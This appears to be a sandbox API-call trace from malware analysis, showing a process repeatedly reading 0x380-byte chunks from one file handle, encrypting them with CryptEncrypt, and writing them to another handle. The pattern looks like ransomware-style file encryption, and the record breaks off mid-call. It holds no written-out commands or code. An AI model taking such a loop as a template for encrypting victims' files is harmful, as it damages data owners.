ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.539] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.539] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.540] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.540] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.540] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.540] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.543] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.543] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.543] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.543] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.543] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.544] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.544] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.544] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.544] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.544] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.544] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.544] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.544] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.544] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.545] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.545] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.545] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.545] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.545] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.545] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.545] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.545] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.545] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.546] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.546] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.546] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.546] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.546] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.546] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.546] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.547] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.547] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.547] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.547] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.547] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.547] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.547] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.547] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.547] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.548] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.548] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.548] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.548] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.548] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.548] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.548] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.548] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.548] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.548] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.548] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.549] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.549] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.549] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.549] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.549] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.549] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.549] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.550] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.550] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.550] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.550] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.550] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.550] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.550] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.550] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.550] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.550] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.551] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.551] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.551] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.551] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.551] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.554] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.554] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.554] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.554] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.554] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.554] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.554] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.554] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.555] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.555] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.555] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.555] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.555] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.555] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.555] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.555] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.555] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.555] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.556] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.556] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.556] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.556] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.556] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.556] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.556] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, 